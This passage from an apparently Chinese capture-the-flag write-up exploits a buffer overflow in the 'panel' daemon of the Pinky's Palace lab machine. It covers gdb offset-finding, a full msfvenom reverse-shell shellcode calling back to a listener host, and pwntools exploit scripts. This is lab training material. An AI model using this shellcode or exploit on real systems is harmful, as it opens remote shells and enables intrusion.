bind(fd, &addr, 0x10u) == -1 )\n fatal("binding to socket", &addr);\n if ( listen(fd, 5) == -1 )\n fatal("listening", 5LL);\n addr_len = 16;\n v8 = accept(fd, &v5, &addr_len);\n if ( v8 == -1 )\n fatal("new sock failed", &v5);\n send(v8, "[+] Welcome to The Daemon [+]\\n", 0x1FuLL, 0);\n send(v8, "This is soon to be our backdoor\\n", 0x21uLL, 0);\n send(v8, "into Pinky's Palace.\\n=> ", 0x19uLL, 0);\n v10 = recv(v8, &buf, 0x1000uLL, 0);\n handlecmd(&buf, (unsigned int)v8);\n close(v8);\n exit(0);\n}<\/code><\/pre>\n\/\/ handlecmd\nssize_t __fastcall handlecmd(const char *a1, int a2)\n{\n size_t v2; \/\/ rax\n char dest; \/\/ [rsp+10h] [rbp-70h]\n\n strcpy(&dest, a1); \/\/strcpy\u53ef\u80fd\u5b58\u5728\u6ea2\u51fa\u6f0f\u6d1e\n v2 = strlen(&dest);\n return send(a2, &dest, v2, 0);\n}<\/code><\/pre>\n\u770b\u4e0a\u53bb\u662f\u4e00\u5f00\u59cb\u6211\u4eec\u78b0\u5230\u7684\u6302\u8f7d\u5728\u67d0\u4e2a\u7aef\u53e3\u7684\u90a3\u4e2a\u4e8c\u8fdb\u5236\u7a0b\u5e8f\uff01\uff01\uff01<\/p>\n
pwn the panel<\/h3>\n
\u67e5\u770b\u4e00\u4e0b\u6709\u5565\u4fdd\u62a4\uff1a<\/p>\n
<\/div><\/p>\n\u53ef\u4ee5\u5c1d\u8bd5\u6ea2\u51fa\u6f0f\u6d1e\u653b\u51fb\u7684\u3002\u3002<\/p>\n
gdb-peda \u5206\u6790<\/h3>\n
\u5148\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n
\n\u770b\u5230\u5e08\u5085\u7684blog\u6709\u8fd9\u6bb5\u63cf\u8ff0\uff1a<\/p>\n
\u6bcf\u6b21nc\u8fde\u63a5\u8f93\u5165\u540e\uff0c\u7a0b\u5e8f\u4f1a\u518d\u6b21\u521b\u5efa\u4e00\u4e2a\u5b50\u8fdb\u7a0b\u3002gdb\u9ed8\u8ba4\u8ddf\u8e2a\u7684\u662f\u7236\u8fdb\u7a0b\uff0c\u4f1a\u770b\u4e0d\u5230\u5b50\u8fdb\u7a0b\u7684\u5177\u4f53\u5185\u5bb9\u3002\u6240\u4ee5\u8ba9gdb\u8ddf\u8e2a\u5b50\u8fdb\u7a0b\uff0c\u518d\u5c06\u7236\u8fdb\u7a0b\u8bbe\u7f6e\u4e3a\u6682\u505c\u72b6\u6001\uff0c\u5c31\u4e0d\u7528\u53cd\u590d\u5173\u8fdb\u7a0b\u4e86<\/p>\n<\/blockquote>\n
set follow-fork-mode child\nset detach-on-fork off<\/code><\/pre>\n\n- \u5148\u4f7f\u7528
info function<\/code>\u67e5\u770b\u6ea2\u51fa\u51fd\u6570<\/li>\nchmod 700 panel<\/code>\u8d4b\u4e88\u6743\u9650<\/li>\nrun<\/code>\u8fd0\u884c\u7a0b\u5e8f\uff0c\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u8fd0\u884c\u4e86\uff1anetstat -antlp<\/code>\uff0c\u5982\u679c\u5173\u95ed\u53ef\u4ee5\u4f7f\u7528pkill -9 panel;pkill -i panel<\/code><\/li>\npattern_create 200<\/code> \u751f\u6210\u6d4b\u8bd5\u5b57\u7b26\u4e32<\/li>\ndisasseble handlecmd<\/code>\u62c6\u89e3\u51fd\u6570<\/li>\nb *handlecmd+70<\/code>\u8bbe\u7f6e\u65ad\u70b9<\/li>\n<\/ol>\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ netstat -antlp\nActive Internet connections (servers and established)\nProto Recv-Q Send-Q Local Address Foreign Address State PID\/Program name \ntcp 0 0 0.0.0.0:31337 0.0.0.0:* LISTEN 229003\/panel <\/code><\/pre>\ngdb-peda$ pattern_create 200\n'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'<\/code><\/pre>\n<\/div><\/p>\ngdb-peda$ b *handlecmd+70\nBreakpoint 1 at 0x4009aa<\/code><\/pre>\n# gdb-peda .\/panel\nstart\nb *handlecmd+70\nrun\n# kali\ngdb-peda \npattern create 256 pattern\ncat pattern | nc localhost 31337<\/code><\/pre>\n<\/div><\/p>\n<\/div><\/p>\n\u53d1\u73b0\u6ea2\u51fa\u4f4d\u7f6e\u5728120\u5904\u3002<\/p>\n
\u91cd\u65b0\u8fdb\u884c\u6ea2\u51fa\uff1a<\/p>\n
# gdb-peda .\/panel\ngdb-peda .\/panel\nstart\nb *handlecmd+70\nrun\n# kali\npkill -9 panel;pkill -i panel\npython -c 'print("A"*120+"B"*6)'|nc localhost 31337<\/code><\/pre>\n<\/div><\/p>\nmsfvenom\u751f\u6210<\/h4>\nmsfvenom -a x64 -p linux\/x64\/shell_reverse_tcp LHOST=192.168.244.128 LPORT=8888 -b '\\x00' -f python<\/code><\/pre>\n[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\nFound 4 compatible encoders\nAttempting to encode payload with 1 iterations of generic\/none\ngeneric\/none failed with Encoding failed due to a bad character (index=17, char=0x00)\nAttempting to encode payload with 1 iterations of x64\/xor\nx64\/xor succeeded with size 119 (iteration=0)\nx64\/xor chosen with final size 119\nPayload size: 119 bytes\nFinal size of python file: 597 bytes\nbuf = b""\nbuf += b"\\x48\\x31\\xc9\\x48\\x81\\xe9\\xf6\\xff\\xff\\xff\\x48\\x8d"\nbuf += b"\\x05\\xef\\xff\\xff\\xff\\x48\\xbb\\x44\\xc9\\x75\\x8c\\x5a"\nbuf += b"\\x04\\xa9\\x34\\x48\\x31\\x58\\x27\\x48\\x2d\\xf8\\xff\\xff"\nbuf += b"\\xff\\xe2\\xf4\\x2e\\xe0\\x2d\\x15\\x30\\x06\\xf6\\x5e\\x45"\nbuf += b"\\x97\\x7a\\x89\\x12\\x93\\xe1\\x8d\\x46\\xc9\\x57\\x34\\x9a"\nbuf += b"\\xac\\x5d\\xb4\\x15\\x81\\xfc\\x6a\\x30\\x14\\xf3\\x5e\\x6e"\nbuf += b"\\x91\\x7a\\x89\\x30\\x07\\xf7\\x7c\\xbb\\x07\\x1f\\xad\\x02"\nbuf += b"\\x0b\\xac\\x41\\xb2\\xa3\\x4e\\xd4\\xc3\\x4c\\x12\\x1b\\x26"\nbuf += b"\\xa0\\x1b\\xa3\\x29\\x6c\\xa9\\x67\\x0c\\x40\\x92\\xde\\x0d"\nbuf += b"\\x4c\\x20\\xd2\\x4b\\xcc\\x75\\x8c\\x5a\\x04\\xa9\\x34"<\/code><\/pre>\n-b '\\x00'<\/code>: \u6307\u5b9a\u8981\u907f\u514d\u7684\u5b57\u8282\u5e8f\u5217\uff0c\u8fd9\u91cc\u6307\u5b9a\u4e86 \\x00<\/code>\uff08\u7a7a\u5b57\u8282\uff09\u3002<\/p>\nrsp\u5730\u57400x400cfb<\/code>\u662f\u5c0f\u7aef\u683c\u5f0f\uff0c\u5728\u7f51\u7edc\u4e2d\u4f20\u8f93\u65f6\u5e94\u8be5\u7528\u5927\u7aef\u683c\u5f0f\u8868\u793a\uff0c\u811a\u672c\u4e2d\u4e3a\uff1a\\xfb\\x0c\\x40\\x00\\x00\\x00<\/code><\/p>\n\u4e0d\u4ec5\u8981\u62fc\u63a5\\x90<\/code>\uff0c\u8fd8\u8981\u62fc\u63a5rsp\u5730\u5740\uff1a<\/p>\n\n[ shellcode ] + [ \\x90 ] + [ \\xfb\\x0c\\x40\\x00 ] => 119 + 1 + 4 <\/p>\n<\/blockquote>\n
\u7f16\u5199python\u811a\u672c\uff1a<\/p>\n
from pwn import *\n\nbuf = b""\nbuf += b"\\x48\\x31\\xc9\\x48\\x81\\xe9\\xf6\\xff\\xff\\xff\\x48\\x8d"\nbuf += b"\\x05\\xef\\xff\\xff\\xff\\x48\\xbb\\x44\\xc9\\x75\\x8c\\x5a"\nbuf += b"\\x04\\xa9\\x34\\x48\\x31\\x58\\x27\\x48\\x2d\\xf8\\xff\\xff"\nbuf += b"\\xff\\xe2\\xf4\\x2e\\xe0\\x2d\\x15\\x30\\x06\\xf6\\x5e\\x45"\nbuf += b"\\x97\\x7a\\x89\\x12\\x93\\xe1\\x8d\\x46\\xc9\\x57\\x34\\x9a"\nbuf += b"\\xac\\x5d\\xb4\\x15\\x81\\xfc\\x6a\\x30\\x14\\xf3\\x5e\\x6e"\nbuf += b"\\x91\\x7a\\x89\\x30\\x07\\xf7\\x7c\\xbb\\x07\\x1f\\xad\\x02"\nbuf += b"\\x0b\\xac\\x41\\xb2\\xa3\\x4e\\xd4\\xc3\\x4c\\x12\\x1b\\x26"\nbuf += b"\\xa0\\x1b\\xa3\\x29\\x6c\\xa9\\x67\\x0c\\x40\\x92\\xde\\x0d"\nbuf += b"\\x4c\\x20\\xd2\\x4b\\xcc\\x75\\x8c\\x5a\\x04\\xa9\\x34\\x90"\n\nret = p64(0x400cfb)\nprint (ret)\npayload = buf + ret\n\nr = remote("192.168.244.131", 31337)\nr.recv()\nr.send(payload)\nprint("fuck it over!")<\/code><\/pre>\n<\/div><\/p>\n\u83b7\u53d6\u5230\u4e86flag\uff01\uff01\uff01<\/p>\n
gdb\u5206\u6790+ropper\uff08c0dedead\u5e08\u5085\u7684\u505a\u6cd5\uff09<\/h3>\n
\u590d\u73b0\u4e00\u4e0bc0dedead<\/code>\u5e08\u5085\u7684\u505a\u6cd5\u53ea\u4e3a\u4e86\u5b66\u4e60\uff1a<\/p>\n\u9996\u5148\u4f7f\u7528\u811a\u672c\u6d4b\u8bd5\u6613\u53d7\u653b\u51fb\u7f13\u51b2\u533a\u957f\u5ea6\uff1a<\/p>\n
#!\/usr\/bin\/env python3\nfrom pwn import *\n\nHOST = 'localhost'\nPORT = 31337\n\npwncode = cyclic(length=0x400,n=8)\npayload = pwncode\n\np = remote(HOST,PORT)\np.recvuntil(b'=> ')\np.sendline(payload)\nprint(p.recvall().decode())<\/code><\/pre>\n<\/div><\/p>\n\u7136\u540e\u5217\u51fa\u4e00\u4e0bpanel<\/code>\u5728\u7cfb\u7edf\u5185\u7684\u8fd0\u884c\u60c5\u51b5\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp]\n\u2514\u2500$ coredumpctl list panel\nTIME PID UID GID SIG COREFILE EXE SIZE\nTue 2024-02-27 03:38:40 EST 1505898 1000 1000 SIGSEGV present \/home\/kali\/temp\/panel 103.2K<\/code><\/pre>\n\ncoredumpctl list<\/code>\u662f\u4e00\u4e2a\u7528\u4e8e\u5217\u51fa\u7cfb\u7edf\u4e2d\u7684core dump<\/code>\u6587\u4ef6\u7684\u547d\u4ee4<\/p>\n<\/blockquote>\n\u8fdb\u884c\u8c03\u8bd5\uff1a<\/p>\n
coredumpctl debug panel<\/code><\/pre>\n\u4f1a\u81ea\u52a8\u542f\u52a8\u4e00\u4e2agdb<\/code>\u8fdb\u884c\u8c03\u8bd5:<\/p>\n(gdb) info reg -->\u8f6c\u50a8\u5bc4\u5b58\u5668\u503c\nrax 0x401 1025\nrbx 0x7fffffffdeb8 140737488346808\nrcx 0x7ffff7ed1939 140737352898873\nrdx 0x401 1025\nrsi 0x7fffffffccd0 140737488342224\nrdi 0x4 4\nrbp 0x616161616161616f 0x616161616161616f\nrsp 0x7fffffffcd48 0x7fffffffcd48\nr8 0x0 0\nr9 0x0 0\nr10 0x0 0\nr11 0x246 582\nr12 0x0 0\nr13 0x7fffffffdec8 140737488346824\nr14 0x0 0\nr15 0x7ffff7ffd000 140737354125312\nrip 0x4009aa 0x4009aa <handlecmd+70>\neflags 0x10203 [ CF IF RF ]\ncs 0x33 51\nss 0x2b 43\nds 0x0 0\nes 0x0 0\nfs 0x0 0\ngs 0x0 0<\/code><\/pre>\nrbp:0x616161616161616f<\/code>\u8f6c\u6362\u4e3a ASCII \u4e3apaaaaaaa<\/code>\u3002<\/p>\n\u67e5\u627e\u4e00\u4e0b\u504f\u79fb\u91cf\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp]\n\u2514\u2500$ python3 \nPython 3.11.7 (main, Dec 8 2023, 14:22:46) [GCC 13.2.0] on linux\nType "help", "copyright", "credits" or "license" for more information.\n>>> from pwn import *\n>>> print(cyclic_find('paaaaaaa',n=8))\n120<\/code><\/pre>\n
![\"image-20240226154237183\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747007.png\")
<\/div><\/p>\n![\"image-20240226154503800\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747008.png\")
<\/div><\/p>\n![\"image-20240226160830687\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747009.png\")
<\/div><\/p>\n![\"image-20240226161309546\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747010.png\")
<\/div><\/p>\n![\"image-20240226161808864\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747011.png\")
<\/div><\/p>\n![\"image-20240226161951727\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747012.png\")
<\/div><\/p>\n![\"image-20240226164817574\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747013.png\")
<\/div><\/p>\n![\"image-20240226170224483\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747014.png\")
<\/div><\/p>\n![\"image-20240226170441771\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747015.png\")
<\/div><\/p>\n![\"image-20240226174430490\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747016.png\")
<\/div><\/p>\n![\"image-20240226181844064\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747017.png\")
<\/div><\/p>\n![\"image-20240226182105526\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747018.png\")
<\/div><\/p>\n![\"image-20240226182208890\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747019.png\")
<\/div>![\"image-20240226182303525\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747020.png\")
<\/div><\/p>\n![\"image-20240226183544975\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747021.png\")
<\/div><\/p>\n![\"image-20240226184235699\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747022.png\")
<\/div><\/p>\n![\"image-20240226220721658\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747023.png\")
<\/div><\/p>\n![\"image-20240226221541752\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747024.png\")
<\/div><\/p>\n![\"image-20240226221740864\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747025.png\")
<\/div><\/p>\n![\"image-20240226221900864\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747026.png\")
<\/div><\/p>\n![\"image-20240226222349801\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747027.png\")
<\/div><\/p>\n![\"image-20240226224533521\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747028.png\")
<\/div><\/p>\n![\"image-20240226224938142\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747029.png\")
<\/div><\/p>\n![\"image-20240226233742061\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747030.png\")
<\/div><\/p>\n![\"image-20240226235405973\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747031.png\")
<\/div><\/p>\n![\"image-20240227000528687\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747032.png\")
<\/div><\/p>\n![\"image-20240227001016958\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747033.png\")
<\/div><\/p>\n![\"image-20240227004758106\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747034.png\")
<\/div><\/p>\n![\"image-20240227140001579\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747035.png\")
<\/div><\/p>\n![\"image-20240227143511724\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747036.png\")
<\/div><\/p>\n![\"image-20240227145152907\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747037.png\")
<\/div><\/p>\n![\"image-20240227150241344\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747038.png\")
<\/div><\/p>\n![\"image-20240227162503559\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747039.png\")
<\/div><\/p>\n![\"image-20240227163856514\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747040.png\")
<\/div><\/p>\n